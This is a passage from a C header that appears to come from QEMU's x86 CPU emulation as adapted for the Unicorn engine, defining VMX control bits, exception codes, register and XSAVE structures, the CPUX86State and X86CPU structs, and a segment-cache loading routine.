0x7FFFFFFFull #define MSR_VMX_BASIC_VMXON_REGION_SIZE_MASK (0x00001FFFull << 32) #define MSR_VMX_BASIC_VMCS_MEM_TYPE_MASK (0x003C0000ull << 32) #define MSR_VMX_BASIC_DUAL_MONITOR (1ULL << 49) #define MSR_VMX_BASIC_INS_OUTS (1ULL << 54) #define MSR_VMX_BASIC_TRUE_CTLS (1ULL << 55) #define MSR_VMX_MISC_PREEMPTION_TIMER_SHIFT_MASK 0x1Full #define MSR_VMX_MISC_STORE_LMA (1ULL << 5) #define MSR_VMX_MISC_ACTIVITY_HLT (1ULL << 6) #define MSR_VMX_MISC_ACTIVITY_SHUTDOWN (1ULL << 7) #define MSR_VMX_MISC_ACTIVITY_WAIT_SIPI (1ULL << 8) #define MSR_VMX_MISC_MAX_MSR_LIST_SIZE_MASK 0x0E000000ull #define MSR_VMX_MISC_VMWRITE_VMEXIT (1ULL << 29) #define MSR_VMX_MISC_ZERO_LEN_INJECT (1ULL << 30) #define MSR_VMX_EPT_EXECONLY (1ULL << 0) #define MSR_VMX_EPT_PAGE_WALK_LENGTH_4 (1ULL << 6) #define MSR_VMX_EPT_PAGE_WALK_LENGTH_5 (1ULL << 7) #define MSR_VMX_EPT_UC (1ULL << 8) #define MSR_VMX_EPT_WB (1ULL << 14) #define MSR_VMX_EPT_2MB (1ULL << 16) #define MSR_VMX_EPT_1GB (1ULL << 17) #define MSR_VMX_EPT_INVEPT (1ULL << 20) #define MSR_VMX_EPT_AD_BITS (1ULL << 21) #define MSR_VMX_EPT_ADVANCED_VMEXIT_INFO (1ULL << 22) #define MSR_VMX_EPT_INVEPT_SINGLE_CONTEXT (1ULL << 25) #define MSR_VMX_EPT_INVEPT_ALL_CONTEXT (1ULL << 26) #define MSR_VMX_EPT_INVVPID (1ULL << 32) #define MSR_VMX_EPT_INVVPID_SINGLE_ADDR (1ULL << 40) #define MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT (1ULL << 41) #define MSR_VMX_EPT_INVVPID_ALL_CONTEXT (1ULL << 42) #define MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT_NOGLOBALS (1ULL << 43) #define MSR_VMX_VMFUNC_EPT_SWITCHING (1ULL << 0) /* VMX controls */ #define VMX_CPU_BASED_VIRTUAL_INTR_PENDING 0x00000004 #define VMX_CPU_BASED_USE_TSC_OFFSETING 0x00000008 #define VMX_CPU_BASED_HLT_EXITING 0x00000080 #define VMX_CPU_BASED_INVLPG_EXITING 0x00000200 #define VMX_CPU_BASED_MWAIT_EXITING 0x00000400 #define VMX_CPU_BASED_RDPMC_EXITING 0x00000800 #define VMX_CPU_BASED_RDTSC_EXITING 0x00001000 #define VMX_CPU_BASED_CR3_LOAD_EXITING 0x00008000 #define VMX_CPU_BASED_CR3_STORE_EXITING 0x00010000 #define VMX_CPU_BASED_CR8_LOAD_EXITING 0x00080000 #define VMX_CPU_BASED_CR8_STORE_EXITING 0x00100000 #define VMX_CPU_BASED_TPR_SHADOW 0x00200000 #define VMX_CPU_BASED_VIRTUAL_NMI_PENDING 0x00400000 #define VMX_CPU_BASED_MOV_DR_EXITING 0x00800000 #define VMX_CPU_BASED_UNCOND_IO_EXITING 0x01000000 #define VMX_CPU_BASED_USE_IO_BITMAPS 0x02000000 #define VMX_CPU_BASED_MONITOR_TRAP_FLAG 0x08000000 #define VMX_CPU_BASED_USE_MSR_BITMAPS 0x10000000 #define VMX_CPU_BASED_MONITOR_EXITING 0x20000000 #define VMX_CPU_BASED_PAUSE_EXITING 0x40000000 #define VMX_CPU_BASED_ACTIVATE_SECONDARY_CONTROLS 0x80000000 #define VMX_SECONDARY_EXEC_VIRTUALIZE_APIC_ACCESSES 0x00000001 #define VMX_SECONDARY_EXEC_ENABLE_EPT 0x00000002 #define VMX_SECONDARY_EXEC_DESC 0x00000004 #define VMX_SECONDARY_EXEC_RDTSCP 0x00000008 #define VMX_SECONDARY_EXEC_VIRTUALIZE_X2APIC_MODE 0x00000010 #define VMX_SECONDARY_EXEC_ENABLE_VPID 0x00000020 #define VMX_SECONDARY_EXEC_WBINVD_EXITING 0x00000040 #define VMX_SECONDARY_EXEC_UNRESTRICTED_GUEST 0x00000080 #define VMX_SECONDARY_EXEC_APIC_REGISTER_VIRT 0x00000100 #define VMX_SECONDARY_EXEC_VIRTUAL_INTR_DELIVERY 0x00000200 #define VMX_SECONDARY_EXEC_PAUSE_LOOP_EXITING 0x00000400 #define VMX_SECONDARY_EXEC_RDRAND_EXITING 0x00000800 #define VMX_SECONDARY_EXEC_ENABLE_INVPCID 0x00001000 #define VMX_SECONDARY_EXEC_ENABLE_VMFUNC 0x00002000 #define VMX_SECONDARY_EXEC_SHADOW_VMCS 0x00004000 #define VMX_SECONDARY_EXEC_ENCLS_EXITING 0x00008000 #define VMX_SECONDARY_EXEC_RDSEED_EXITING 0x00010000 #define VMX_SECONDARY_EXEC_ENABLE_PML 0x00020000 #define VMX_SECONDARY_EXEC_XSAVES 0x00100000 #define VMX_PIN_BASED_EXT_INTR_MASK 0x00000001 #define VMX_PIN_BASED_NMI_EXITING 0x00000008 #define VMX_PIN_BASED_VIRTUAL_NMIS 0x00000020 #define VMX_PIN_BASED_VMX_PREEMPTION_TIMER 0x00000040 #define VMX_PIN_BASED_POSTED_INTR 0x00000080 #define VMX_VM_EXIT_SAVE_DEBUG_CONTROLS 0x00000004 #define VMX_VM_EXIT_HOST_ADDR_SPACE_SIZE 0x00000200 #define VMX_VM_EXIT_LOAD_IA32_PERF_GLOBAL_CTRL 0x00001000 #define VMX_VM_EXIT_ACK_INTR_ON_EXIT 0x00008000 #define VMX_VM_EXIT_SAVE_IA32_PAT 0x00040000 #define VMX_VM_EXIT_LOAD_IA32_PAT 0x00080000 #define VMX_VM_EXIT_SAVE_IA32_EFER 0x00100000 #define VMX_VM_EXIT_LOAD_IA32_EFER 0x00200000 #define VMX_VM_EXIT_SAVE_VMX_PREEMPTION_TIMER 0x00400000 #define VMX_VM_EXIT_CLEAR_BNDCFGS 0x00800000 #define VMX_VM_EXIT_PT_CONCEAL_PIP 0x01000000 #define VMX_VM_EXIT_CLEAR_IA32_RTIT_CTL 0x02000000 #define VMX_VM_ENTRY_LOAD_DEBUG_CONTROLS 0x00000004 #define VMX_VM_ENTRY_IA32E_MODE 0x00000200 #define VMX_VM_ENTRY_SMM 0x00000400 #define VMX_VM_ENTRY_DEACT_DUAL_MONITOR 0x00000800 #define VMX_VM_ENTRY_LOAD_IA32_PERF_GLOBAL_CTRL 0x00002000 #define VMX_VM_ENTRY_LOAD_IA32_PAT 0x00004000 #define VMX_VM_ENTRY_LOAD_IA32_EFER 0x00008000 #define VMX_VM_ENTRY_LOAD_BNDCFGS 0x00010000 #define VMX_VM_ENTRY_PT_CONCEAL_PIP 0x00020000 #define VMX_VM_ENTRY_LOAD_IA32_RTIT_CTL 0x00040000 /* Supported Hyper-V Enlightenments */ #define HYPERV_FEAT_RELAXED 0 #define HYPERV_FEAT_VAPIC 1 #define HYPERV_FEAT_TIME 2 #define HYPERV_FEAT_CRASH 3 #define HYPERV_FEAT_RESET 4 #define HYPERV_FEAT_VPINDEX 5 #define HYPERV_FEAT_RUNTIME 6 #define HYPERV_FEAT_SYNIC 7 #define HYPERV_FEAT_STIMER 8 #define HYPERV_FEAT_FREQUENCIES 9 #define HYPERV_FEAT_REENLIGHTENMENT 10 #define HYPERV_FEAT_TLBFLUSH 11 #define HYPERV_FEAT_EVMCS 12 #define HYPERV_FEAT_IPI 13 #define HYPERV_FEAT_STIMER_DIRECT 14 #ifndef HYPERV_SPINLOCK_NEVER_RETRY #define HYPERV_SPINLOCK_NEVER_RETRY 0xFFFFFFFF #endif #define EXCP00_DIVZ 0 #define EXCP01_DB 1 #define EXCP02_NMI 2 #define EXCP03_INT3 3 #define EXCP04_INTO 4 #define EXCP05_BOUND 5 #define EXCP06_ILLOP 6 #define EXCP07_PREX 7 #define EXCP08_DBLE 8 #define EXCP09_XERR 9 #define EXCP0A_TSS 10 #define EXCP0B_NOSEG 11 #define EXCP0C_STACK 12 #define EXCP0D_GPF 13 #define EXCP0E_PAGE 14 #define EXCP10_COPR 16 #define EXCP11_ALGN 17 #define EXCP12_MCHK 18 #define EXCP_VMEXIT 0x100 /* only for system emulation */ #define EXCP_SYSCALL 0x101 /* only for user emulation */ #define EXCP_VSYSCALL 0x102 /* only for user emulation */ /* i386-specific interrupt pending bits. */ #define CPU_INTERRUPT_POLL CPU_INTERRUPT_TGT_EXT_1 #define CPU_INTERRUPT_SMI CPU_INTERRUPT_TGT_EXT_2 #define CPU_INTERRUPT_NMI CPU_INTERRUPT_TGT_EXT_3 #define CPU_INTERRUPT_MCE CPU_INTERRUPT_TGT_EXT_4 #define CPU_INTERRUPT_VIRQ CPU_INTERRUPT_TGT_INT_0 #define CPU_INTERRUPT_SIPI CPU_INTERRUPT_TGT_INT_1 #define CPU_INTERRUPT_TPR CPU_INTERRUPT_TGT_INT_2 /* Use a clearer name for this. */ #define CPU_INTERRUPT_INIT CPU_INTERRUPT_RESET /* Instead of computing the condition codes after each x86 instruction, * QEMU just stores one operand (called CC_SRC), the result * (called CC_DST) and the type of operation (called CC_OP). When the * condition codes are needed, the condition codes can be calculated * using this information. Condition codes are not generated if they * are only needed for conditional branches. */ typedef enum { CC_OP_DYNAMIC, /* must use dynamic code to get cc_op */ CC_OP_EFLAGS, /* all cc are explicitly computed, CC_SRC = flags */ CC_OP_MULB, /* modify all flags, C, O = (CC_SRC != 0) */ CC_OP_MULW, CC_OP_MULL, CC_OP_MULQ, CC_OP_ADDB, /* modify all flags, CC_DST = res, CC_SRC = src1 */ CC_OP_ADDW, CC_OP_ADDL, CC_OP_ADDQ, CC_OP_ADCB, /* modify all flags, CC_DST = res, CC_SRC = src1 */ CC_OP_ADCW, CC_OP_ADCL, CC_OP_ADCQ, CC_OP_SUBB, /* modify all flags, CC_DST = res, CC_SRC = src1 */ CC_OP_SUBW, CC_OP_SUBL, CC_OP_SUBQ, CC_OP_SBBB, /* modify all flags, CC_DST = res, CC_SRC = src1 */ CC_OP_SBBW, CC_OP_SBBL, CC_OP_SBBQ, CC_OP_LOGICB, /* modify all flags, CC_DST = res */ CC_OP_LOGICW, CC_OP_LOGICL, CC_OP_LOGICQ, CC_OP_INCB, /* modify all flags except, CC_DST = res, CC_SRC = C */ CC_OP_INCW, CC_OP_INCL, CC_OP_INCQ, CC_OP_DECB, /* modify all flags except, CC_DST = res, CC_SRC = C */ CC_OP_DECW, CC_OP_DECL, CC_OP_DECQ, CC_OP_SHLB, /* modify all flags, CC_DST = res, CC_SRC.msb = C */ CC_OP_SHLW, CC_OP_SHLL, CC_OP_SHLQ, CC_OP_SARB, /* modify all flags, CC_DST = res, CC_SRC.lsb = C */ CC_OP_SARW, CC_OP_SARL, CC_OP_SARQ, CC_OP_BMILGB, /* Z,S via CC_DST, C = SRC==0; O=0; P,A undefined */ CC_OP_BMILGW, CC_OP_BMILGL, CC_OP_BMILGQ, CC_OP_ADCX, /* CC_DST = C, CC_SRC = rest. */ CC_OP_ADOX, /* CC_DST = O, CC_SRC = rest. */ CC_OP_ADCOX, /* CC_DST = C, CC_SRC2 = O, CC_SRC = rest. */ CC_OP_CLR, /* Z set, all other flags clear. */ CC_OP_POPCNT, /* Z via CC_SRC, all other flags clear. */ CC_OP_NB, } CCOp; typedef struct SegmentCache { uint32_t selector; target_ulong base; uint32_t limit; uint32_t flags; } SegmentCache; #define MMREG_UNION(n, bits) \ union n { \ uint8_t _b_##n[(bits)/8]; \ uint16_t _w_##n[(bits)/16]; \ uint32_t _l_##n[(bits)/32]; \ uint64_t _q_##n[(bits)/64]; \ float32 _s_##n[(bits)/32]; \ float64 _d_##n[(bits)/64]; \ } typedef union { uint8_t _b[16]; uint16_t _w[8]; uint32_t _l[4]; uint64_t _q[2]; float32 _s[4]; float64 _d[2]; } XMMReg; typedef union { uint8_t _b[32]; uint16_t _w[16]; uint32_t _l[8]; uint64_t _q[4]; float32 _s[8]; float64 _d[4]; } YMMReg; #if 0 typedef union { uint8_t _b[64]; uint16_t _w[32]; uint32_t _l[16]; uint64_t _q[8]; float32 _s[16]; float64 _d[8]; } ZMMReg; #endif typedef MMREG_UNION(ZMMReg, 512) ZMMReg; typedef MMREG_UNION(MMXReg, 64) MMXReg; typedef struct BNDReg { uint64_t lb; uint64_t ub; } BNDReg; typedef struct BNDCSReg { uint64_t cfgu; uint64_t sts; } BNDCSReg; #define BNDCFG_ENABLE 1ULL #define BNDCFG_BNDPRESERVE 2ULL #define BNDCFG_BDIR_MASK TARGET_PAGE_MASK #ifdef HOST_WORDS_BIGENDIAN #define ZMM_B(n) _b_ZMMReg[63 - (n)] #define ZMM_W(n) _w_ZMMReg[31 - (n)] #define ZMM_L(n) _l_ZMMReg[15 - (n)] #define ZMM_S(n) _s_ZMMReg[15 - (n)] #define ZMM_Q(n) _q_ZMMReg[7 - (n)] #define ZMM_D(n) _d_ZMMReg[7 - (n)] #define MMX_B(n) _b_MMXReg[7 - (n)] #define MMX_W(n) _w_MMXReg[3 - (n)] #define MMX_L(n) _l_MMXReg[1 - (n)] #define MMX_S(n) _s_MMXReg[1 - (n)] #else #define ZMM_B(n) _b_ZMMReg[n] #define ZMM_W(n) _w_ZMMReg[n] #define ZMM_L(n) _l_ZMMReg[n] #define ZMM_S(n) _s_ZMMReg[n] #define ZMM_Q(n) _q_ZMMReg[n] #define ZMM_D(n) _d_ZMMReg[n] #define MMX_B(n) _b_MMXReg[n] #define MMX_W(n) _w_MMXReg[n] #define MMX_L(n) _l_MMXReg[n] #define MMX_S(n) _s_MMXReg[n] #endif #define MMX_Q(n) _q_MMXReg[n] typedef union { floatx80 QEMU_ALIGN(16, d); MMXReg mmx; } FPReg; typedef struct { uint64_t base; uint64_t mask; } MTRRVar; #define CPU_NB_REGS64 16 #define CPU_NB_REGS32 8 #ifdef TARGET_X86_64 #define CPU_NB_REGS CPU_NB_REGS64 #else #define CPU_NB_REGS CPU_NB_REGS32 #endif #define MAX_FIXED_COUNTERS 3 #define MAX_GP_COUNTERS (MSR_IA32_PERF_STATUS - MSR_P6_EVNTSEL0) #define TARGET_INSN_START_EXTRA_WORDS 1 #define NB_OPMASK_REGS 8 /* CPU can't have 0xFFFFFFFF APIC ID, use that value to distinguish * that APIC ID hasn't been set yet */ #define UNASSIGNED_APIC_ID 0xFFFFFFFF typedef union X86LegacyXSaveArea { struct { uint16_t fcw; uint16_t fsw; uint8_t ftw; uint8_t reserved; uint16_t fpop; uint64_t fpip; uint64_t fpdp; uint32_t mxcsr; uint32_t mxcsr_mask; FPReg fpregs[8]; uint8_t xmm_regs[16][16]; }; uint8_t data[512]; } X86LegacyXSaveArea; typedef struct X86XSaveHeader { uint64_t xstate_bv; uint64_t xcomp_bv; uint64_t reserve0; uint8_t reserved[40]; } X86XSaveHeader; /* Ext. save area 2: AVX State */ typedef struct XSaveAVX { uint8_t ymmh[16][16]; } XSaveAVX; /* Ext. save area 3: BNDREG */ typedef struct XSaveBNDREG { BNDReg bnd_regs[4]; } XSaveBNDREG; /* Ext. save area 4: BNDCSR */ typedef union XSaveBNDCSR { BNDCSReg bndcsr; uint8_t data[64]; } XSaveBNDCSR; /* Ext. save area 5: Opmask */ typedef struct XSaveOpmask { uint64_t opmask_regs[NB_OPMASK_REGS]; } XSaveOpmask; /* Ext. save area 6: ZMM_Hi256 */ typedef struct XSaveZMM_Hi256 { uint8_t zmm_hi256[16][32]; } XSaveZMM_Hi256; /* Ext. save area 7: Hi16_ZMM */ typedef struct XSaveHi16_ZMM { uint8_t hi16_zmm[16][64]; } XSaveHi16_ZMM; /* Ext. save area 9: PKRU state */ typedef struct XSavePKRU { uint32_t pkru; uint32_t padding; } XSavePKRU; typedef struct X86XSaveArea { X86LegacyXSaveArea legacy; X86XSaveHeader header; /* Extended save areas: */ /* AVX State: */ XSaveAVX avx_state; uint8_t padding[960 - 576 - sizeof(XSaveAVX)]; /* MPX State: */ XSaveBNDREG bndreg_state; XSaveBNDCSR bndcsr_state; /* AVX-512 State: */ XSaveOpmask opmask_state; XSaveZMM_Hi256 zmm_hi256_state; XSaveHi16_ZMM hi16_zmm_state; /* PKRU State: */ XSavePKRU pkru_state; } X86XSaveArea; QEMU_BUILD_BUG_ON(offsetof(X86XSaveArea, avx_state) != 0x240); QEMU_BUILD_BUG_ON(sizeof(XSaveAVX) != 0x100); QEMU_BUILD_BUG_ON(offsetof(X86XSaveArea, bndreg_state) != 0x3c0); QEMU_BUILD_BUG_ON(sizeof(XSaveBNDREG) != 0x40); QEMU_BUILD_BUG_ON(offsetof(X86XSaveArea, bndcsr_state) != 0x400); QEMU_BUILD_BUG_ON(sizeof(XSaveBNDCSR) != 0x40); QEMU_BUILD_BUG_ON(offsetof(X86XSaveArea, opmask_state) != 0x440); QEMU_BUILD_BUG_ON(sizeof(XSaveOpmask) != 0x40); QEMU_BUILD_BUG_ON(offsetof(X86XSaveArea, zmm_hi256_state) != 0x480); QEMU_BUILD_BUG_ON(sizeof(XSaveZMM_Hi256) != 0x200); QEMU_BUILD_BUG_ON(offsetof(X86XSaveArea, hi16_zmm_state) != 0x680); QEMU_BUILD_BUG_ON(sizeof(XSaveHi16_ZMM) != 0x400); QEMU_BUILD_BUG_ON(offsetof(X86XSaveArea, pkru_state) != 0xA80); QEMU_BUILD_BUG_ON(sizeof(XSavePKRU) != 0x8); typedef enum TPRAccess { TPR_ACCESS_READ, TPR_ACCESS_WRITE, } TPRAccess; /* Cache information data structures: */ enum CacheType { DATA_CACHE, INSTRUCTION_CACHE, UNIFIED_CACHE }; typedef struct CPUCacheInfo { enum CacheType type; uint8_t level; /* Size in bytes */ uint32_t size; /* Line size, in bytes */ uint16_t line_size; /* * Associativity. * Note: representation of fully-associative caches is not implemented */ uint8_t associativity; /* Physical line partitions. CPUID[0x8000001D].EBX, CPUID[4].EBX */ uint8_t partitions; /* Number of sets. CPUID[0x8000001D].ECX, CPUID[4].ECX */ uint32_t sets; /* * Lines per tag. * AMD-specific: CPUID[0x80000005], CPUID[0x80000006]. * (Is this synonym to @partitions?) */ uint8_t lines_per_tag; /* Self-initializing cache */ bool self_init; /* * WBINVD/INVD is not guaranteed to act upon lower level caches of * non-originating threads sharing this cache. * CPUID[4].EDX[bit 0], CPUID[0x8000001D].EDX[bit 0] */ bool no_invd_sharing; /* * Cache is inclusive of lower cache levels. * CPUID[4].EDX[bit 1], CPUID[0x8000001D].EDX[bit 1]. */ bool inclusive; /* * A complex function is used to index the cache, potentially using all * address bits. CPUID[4].EDX[bit 2]. */ bool complex_indexing; } CPUCacheInfo; typedef struct CPUCaches { CPUCacheInfo *l1d_cache; CPUCacheInfo *l1i_cache; CPUCacheInfo *l2_cache; CPUCacheInfo *l3_cache; } CPUCaches; typedef struct CPUX86State { /* standard registers */ target_ulong regs[CPU_NB_REGS]; target_ulong eip; target_ulong eflags; /* eflags register. During CPU emulation, CC flags and DF are set to zero because they are stored elsewhere */ /* emulator internal eflags handling */ target_ulong cc_dst; target_ulong cc_src; target_ulong cc_src2; uint32_t cc_op; int32_t df; /* D flag : 1 if D = 0, -1 if D = 1 */ uint32_t hflags; /* TB flags, see HF_xxx constants. These flags are known at translation time. */ uint32_t hflags2; /* various other flags, see HF2_xxx constants. */ /* segments */ SegmentCache segs[6]; /* selector values */ SegmentCache ldt; SegmentCache tr; SegmentCache gdt; /* only base and limit are used */ SegmentCache idt; /* only base and limit are used */ target_ulong cr[5]; /* NOTE: cr1 is unused */ int32_t a20_mask; BNDReg bnd_regs[4]; BNDCSReg bndcs_regs; uint64_t msr_bndcfgs; uint64_t efer; /* Beginning of state preserved by INIT (dummy marker). */ int start_init_save; /* FPU state */ unsigned int fpstt; /* top of stack index */ uint16_t fpus; uint16_t fpuc; uint8_t fptags[8]; /* 0 = valid, 1 = empty */ FPReg fpregs[8]; /* KVM-only so far */ uint16_t fpop; uint16_t fpcs; uint16_t fpds; uint64_t fpip; uint64_t fpdp; /* emulator internal variables */ float_status fp_status; floatx80 ft0; float_status mmx_status; /* for 3DNow! float ops */ float_status sse_status; uint32_t mxcsr; ZMMReg xmm_regs[CPU_NB_REGS == 8 ? 8 : 32]; ZMMReg xmm_t0; MMXReg mmx_t0; XMMReg ymmh_regs[CPU_NB_REGS]; uint64_t opmask_regs[NB_OPMASK_REGS]; YMMReg zmmh_regs[CPU_NB_REGS]; ZMMReg hi16_zmm_regs[CPU_NB_REGS]; /* sysenter registers */ uint32_t sysenter_cs; target_ulong sysenter_esp; target_ulong sysenter_eip; uint64_t star; uint64_t vm_hsave; #ifdef TARGET_X86_64 target_ulong lstar; target_ulong cstar; target_ulong fmask; target_ulong kernelgsbase; #endif uint64_t tsc; uint64_t tsc_adjust; uint64_t tsc_deadline; uint64_t tsc_aux; uint64_t xcr0; uint64_t mcg_status; uint64_t msr_ia32_misc_enable; uint64_t msr_ia32_feature_control; uint64_t msr_fixed_ctr_ctrl; uint64_t msr_global_ctrl; uint64_t msr_global_status; uint64_t msr_global_ovf_ctrl; uint64_t msr_fixed_counters[MAX_FIXED_COUNTERS]; uint64_t msr_gp_counters[MAX_GP_COUNTERS]; uint64_t msr_gp_evtsel[MAX_GP_COUNTERS]; uint64_t pat; uint32_t smbase; uint64_t msr_smi_count; uint32_t pkru; uint32_t tsx_ctrl; uint64_t spec_ctrl; uint64_t virt_ssbd; /* End of state preserved by INIT (dummy marker). */ int end_init_save; uint64_t system_time_msr; uint64_t wall_clock_msr; uint64_t steal_time_msr; uint64_t async_pf_en_msr; uint64_t pv_eoi_en_msr; uint64_t poll_control_msr; /* exception/interrupt handling */ int error_code; int exception_is_int; target_ulong exception_next_eip; target_ulong dr[8]; /* debug registers; note dr4 and dr5 are unused */ union { struct CPUBreakpoint *cpu_breakpoint[4]; struct CPUWatchpoint *cpu_watchpoint[4]; }; /* break/watchpoints for dr[0..3] */ int old_exception; /* exception in flight */ uint64_t vm_vmcb; uint64_t tsc_offset; uint64_t intercept; uint16_t intercept_cr_read; uint16_t intercept_cr_write; uint16_t intercept_dr_read; uint16_t intercept_dr_write; uint32_t intercept_exceptions; uint64_t nested_cr3; uint32_t nested_pg_mode; uint8_t v_tpr; uintptr_t retaddr; /* Fields up to this point are cleared by a CPU reset */ int end_reset_fields; /* Fields after this point are preserved across CPU reset. */ /* processor features (e.g. for CPUID insn) */ /* Minimum cpuid leaf 7 value */ uint32_t cpuid_level_func7; /* Actual cpuid leaf 7 value */ uint32_t cpuid_min_level_func7; /* Minimum level/xlevel/xlevel2, based on CPU model + features */ uint32_t cpuid_min_level, cpuid_min_xlevel, cpuid_min_xlevel2; /* Maximum level/xlevel/xlevel2 value for auto-assignment: */ uint32_t cpuid_max_level, cpuid_max_xlevel, cpuid_max_xlevel2; /* Actual level/xlevel/xlevel2 value: */ uint32_t cpuid_level, cpuid_xlevel, cpuid_xlevel2; uint32_t cpuid_vendor1; uint32_t cpuid_vendor2; uint32_t cpuid_vendor3; uint32_t cpuid_version; FeatureWordArray features; /* Features that were explicitly enabled/disabled */ FeatureWordArray user_features; uint32_t cpuid_model[12]; /* Cache information for CPUID. When legacy-cache=on, the cache data * on each CPUID leaf will be different, because we keep compatibility * with old QEMU versions. */ CPUCaches cache_info_cpuid2, cache_info_cpuid4, cache_info_amd; /* MTRRs */ uint64_t mtrr_fixed[11]; uint64_t mtrr_deftype; MTRRVar mtrr_var[MSR_MTRRcap_VCNT]; /* For KVM */ uint32_t mp_state; int32_t exception_nr; int32_t interrupt_injected; uint8_t soft_interrupt; uint8_t exception_pending; uint8_t exception_injected; uint8_t has_error_code; uint8_t exception_has_payload; uint64_t exception_payload; uint32_t ins_len; uint32_t sipi_vector; bool tsc_valid; int64_t tsc_khz; int64_t user_tsc_khz; /* for sanity check only */ uint64_t mcg_cap; uint64_t mcg_ctl; uint64_t mcg_ext_ctl; uint64_t mce_banks[MCE_BANKS_DEF*4]; uint64_t xstate_bv; /* vmstate */ uint16_t fpus_vmstate; uint16_t fptag_vmstate; uint16_t fpregs_format_vmstate; uint64_t xss; uint32_t umwait; TPRAccess tpr_access_type; unsigned nr_dies; unsigned nr_nodes; unsigned pkg_offset; // Unicorn engine struct uc_struct *uc; } CPUX86State; /** * X86CPU: * @env: #CPUX86State * @migratable: If set, only migratable flags will be accepted when "enforce" * mode is used, and only migratable flags will be included in the "host" * CPU model. * * An x86 CPU. */ struct X86CPU { /*< private >*/ CPUState parent_obj; /*< public >*/ CPUNegativeOffsetState neg; CPUX86State env; uint64_t ucode_rev; bool check_cpuid; bool enforce_cpuid; /* * Force features to be enabled even if the host doesn't support them. * This is dangerous and should be done only for testing CPUID * compatibility. */ bool force_features; bool expose_kvm; bool expose_tcg; bool migratable; bool migrate_smi_count; bool max_features; /* Enable all supported features automatically */ uint32_t apic_id; /* Enables publishing of TSC increment and Local APIC bus frequencies to * the guest OS in CPUID page 0x40000010, the same way that VMWare does. */ bool vmware_cpuid_freq; /* if true the CPUID code directly forward host cache leaves to the guest */ bool cache_info_passthrough; /* if true the CPUID code directly forwards * host monitor/mwait leaves to the guest */ struct { uint32_t eax; uint32_t ebx; uint32_t ecx; uint32_t edx; } mwait; /* Features that were filtered out because of missing host capabilities */ FeatureWordArray filtered_features; /* Enable PMU CPUID bits. This can't be enabled by default yet because * it doesn't have ABI stability guarantees, as it passes all PMU CPUID * bits returned by GET_SUPPORTED_CPUID (that depend on host CPU and kernel * capabilities) directly to the guest. */ bool enable_pmu; /* LMCE support can be enabled/disabled via cpu option 'lmce=on/off'. It is * disabled by default to avoid breaking migration between QEMU with * different LMCE configurations. */ bool enable_lmce; /* Compatibility bits for old machine types. * If true present virtual l3 cache for VM, the vcpus in the same virtual * socket share an virtual l3 cache. */ bool enable_l3_cache; /* Compatibility bits for old machine types. * If true present the old cache topology information */ bool legacy_cache; /* Compatibility bits for old machine types: */ bool enable_cpuid_0xb; /* Enable auto level-increase for all CPUID leaves */ bool full_cpuid_auto_level; /* Enable auto level-increase for Intel Processor Trace leave */ bool intel_pt_auto_level; /* if true fill the top bits of the MTRR_PHYSMASKn variable range */ bool fill_mtrr_mask; /* if true override the phys_bits value with a value read from the host */ bool host_phys_bits; /* if set, limit maximum value for phys_bits when host_phys_bits is true */ uint8_t host_phys_bits_limit; /* Number of physical address bits supported */ uint32_t phys_bits; #if 0 /* in order to simplify APIC support, we leave this pointer to the user */ struct DeviceState *apic_state; struct MemoryRegion *cpu_as_root, *cpu_as_mem, *smram; #endif int32_t node_id; /* NUMA node this CPU belongs to */ int32_t socket_id; int32_t die_id; int32_t core_id; int32_t thread_id; int32_t hv_max_vps; struct X86CPUClass cc; }; #define X86_CPU(obj) ((X86CPU *)obj) #define X86_CPU_CLASS(klass) ((X86CPUClass *)klass) #define X86_CPU_GET_CLASS(obj) (&((X86CPU *)obj)->cc) /** * x86_cpu_do_interrupt: * @cpu: vCPU the interrupt is to be handled by. */ void x86_cpu_do_interrupt(CPUState *cpu); bool x86_cpu_exec_interrupt(CPUState *cpu, int int_req); int x86_cpu_pending_interrupt(CPUState *cs, int interrupt_request); void x86_cpu_get_memory_mapping(CPUState *cpu, MemoryMappingList *list); hwaddr x86_cpu_get_phys_page_attrs_debug(CPUState *cpu, vaddr addr, MemTxAttrs *attrs); void x86_cpu_exec_enter(CPUState *cpu); void x86_cpu_exec_exit(CPUState *cpu); int cpu_x86_support_mca_broadcast(CPUX86State *env); int cpu_get_pic_interrupt(CPUX86State *s); /* MSDOS compatibility mode FPU exception support */ void x86_register_ferr_irq(qemu_irq irq); void cpu_set_ignne(CPUX86State *env); /* mpx_helper.c */ void cpu_sync_bndcs_hflags(CPUX86State *env); /* this function must always be used to load data in the segment cache: it synchronizes the hflags with the segment cache values */ static inline void cpu_x86_load_seg_cache(CPUX86State *env, int seg_reg, unsigned int selector, target_ulong base, unsigned int limit, unsigned int flags) { SegmentCache *sc; unsigned int new_hflags; sc = &env->segs[seg_reg]; sc->selector = selector; sc->base = base; sc->limit = limit; sc->flags = flags; /* update the hidden flags */ { if (seg_reg == R_CS) { #ifdef TARGET_X86_64 if ((env->hflags & HF_LMA_MASK) && (flags & DESC_L_MASK)) { /* long mode */ env->hflags |= HF_CS32_MASK | HF_SS32_MASK | HF_CS64_MASK; env->hflags &= ~(HF_ADDSEG_MASK); } else #endif { /* legacy / compatibility case */ new_hflags = (env->segs[R_CS].flags & DESC_B_MASK) >> (DESC_B_SHIFT - HF_CS32_SHIFT); env->hflags = (env->hflags & ~(HF_CS32_MASK | HF_CS64_MASK)) | new_hflags; } } if (seg_reg == R_SS) { int cpl = (flags >> DESC_DPL_SHIFT) & 3; #if HF_CPL_MASK != 3 #error HF_CPL_MASK is hardcoded #endif env->hflags = (env->hflags & ~HF_CPL_MASK) | cpl; /* Possibly switch between BNDCFGS and BNDCFGU */ cpu_sync_bndcs_hflags(env); } new_hflags = (env->segs[R_SS].flags & DESC_B_MASK) >> (DESC_B_SHIFT - HF_SS32_SHIFT); if (env->hflags & HF_CS64_MASK) { /* zero base assumed for DS, ES and SS in long mode */ } else if (!(env->cr[0] & CR0_PE_MASK) || (env->eflags & VM_MASK) || !(env->hflags & HF_CS32_MASK)) { /* XXX: try to avoid this test. The problem comes from the fact that is real mode or vm86 mode we only modify the 'base' and 'selector' fields of the segment cache to go faster. A solution may be to force addseg to one in translate-i386.c. */ new_hflags |= HF_ADDSEG_MASK; } else { new_hflags |= ((env->segs[R_DS].base | env->segs[R_ES].base | env->segs[R_SS].base) != 0) << HF_ADDSEG_SHIFT; } env->hflags = (env->hflags & ~(HF_SS32_MASK | HF_ADDSEG_MASK)) | new_hflags; } } static inline void cpu_x86_load_seg_cache_sipi(X86CPU *cpu, uint8_t sipi_vector) 